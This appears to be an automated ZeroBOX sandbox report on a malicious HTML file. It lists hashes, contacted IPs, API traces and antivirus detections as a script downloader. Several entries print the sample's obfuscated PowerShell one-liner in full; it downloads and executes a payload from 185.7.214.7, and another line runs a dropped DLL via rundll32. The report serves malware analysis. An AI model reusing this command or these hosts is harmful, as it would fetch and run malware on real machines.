popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

cc.html

Generic Malware Malicious Library Antivirus UPX Malicious Packer AntiDebug DLL OS Processor Check PE32 PE File AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Jan. 18, 2022, 10:04 a.m. Jan. 18, 2022, 10:06 a.m.
Size 10.8KB
Type data
MD5 8f12c9ff33ea9aa35e97faaeb09f63d7
SHA256 c681e3bc032bdcc6923b7d17c1f7ba0fecc80826d9b9f11ebf512183c977b72f
CRC32 7BCB1843
ssdeep 192:aYA6VCkQyw90+qiJ54x7UODA0qJEMKsqBR43Yn+ebOe1uTJpUrH9U3GgVLrcTR6/:aYlUkPoNj5uAODA0qJdXqksOH70ArcT8
Yara None matched

Name Response Post-Analysis Lookup
mecaglobal.com
A 198.12.243.55
198.12.243.55
IP Address Status Action
103.8.26.102 Active Moloch
103.8.26.103 Active Moloch
104.168.155.129 Active Moloch
131.100.24.231 Active Moloch
164.124.101.2 Active Moloch
178.63.25.185 Active Moloch
178.79.147.66 Active Moloch
185.7.214.7 Active Moloch
192.254.71.210 Active Moloch
198.12.243.55 Active Moloch
203.114.109.124 Active Moloch
207.38.84.195 Active Moloch
209.59.138.75 Active Moloch
212.237.17.99 Active Moloch
217.182.143.207 Active Moloch
45.142.114.231 Active Moloch
45.176.232.124 Active Moloch
46.55.222.11 Active Moloch
51.38.71.0 Active Moloch
51.68.175.8 Active Moloch
58.227.42.236 Active Moloch
79.172.212.216 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: IsPublic IsSerial Name BaseType
console_handle: 0x000000000000001b
1 1 0

WriteConsoleW

 buffer: True False Process System.ComponentM...
console_handle: 0x0000000000000023
1 1 0

WriteConsoleW

 buffer: PS C:\Users\test22\Desktop>
console_handle: 0x000000000000002b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000251970
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b70bd50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b70bd50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b70bd50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b724f30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b724f30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725240
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7257f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7257f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7257f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b7258d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b725be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b74ed30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b74ed30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.7.214.7/PP91.PNG
suspicious_features GET method with no useragent header suspicious_request GET http://mecaglobal.com/qxim/TlDTjlxYAdwU/
request GET http://185.7.214.7/PP91.PNG
request GET http://mecaglobal.com/qxim/TlDTjlxYAdwU/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2256
region_size: 3084288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002320000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2256
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002610000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2256
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002a70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa7c7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef7019000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002610000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2404
region_size: 2166784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ad0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2404
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ce0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2404
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\Public\Documents\ssd.dll
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
cmdline powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x0000017c
process_name: smss.exe
process_identifier: 228
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: csrss.exe
process_identifier: 308
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: csrss.exe
process_identifier: 372
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: winlogon.exe
process_identifier: 412
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: services.exe
process_identifier: 448
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: lsm.exe
process_identifier: 472
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: svchost.exe
process_identifier: 584
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: svchost.exe
process_identifier: 664
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: svchost.exe
process_identifier: 788
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: svchost.exe
process_identifier: 840
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: svchost.exe
process_identifier: 1000
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: spoolsv.exe
process_identifier: 320
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: svchost.exe
process_identifier: 1056
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: svchost.exe
process_identifier: 1180
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: IMEDICTUPDATE.EXE
process_identifier: 1240
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: taskhost.exe
process_identifier: 1260
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: dwm.exe
process_identifier: 1364
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: explorer.exe
process_identifier: 1388
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: svchost.exe
process_identifier: 1872
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: pw.exe
process_identifier: 2040
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: SearchIndexer.exe
process_identifier: 928
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: SearchFilterHost.exe
process_identifier: 2064
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: pw.exe
process_identifier: 2752
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: sppsvc.exe
process_identifier: 2928
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: taskhost.exe
process_identifier: 2988
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: SearchProtocolHost.exe
process_identifier: 2196
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: powershell.exe
process_identifier: 1424
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: conhost.exe
process_identifier: 2688
1 1 0

Process32NextW

 snapshot_handle: 0x0000017c
process_name: rundll32.exe
process_identifier: 824
1 1 0
Cyren VBS/Agent.AIB
Avast SNH:Script [Dropper]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
McAfee-GW-Edition BehavesLike.HTML.ExploitBlacole.lg
Ikarus Trojan.Script
AVG SNH:Script [Dropper]
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 139264
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00571000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 18 Jan 2022 01:05:41 GMT Content-Type: image/png Content-Length: 1080 Last-Modified: Mon, 17 Jan 2022 19:33:33 GMT Connection: keep-alive ETag: "61e5c48d-438" Accept-Ranges: bytes
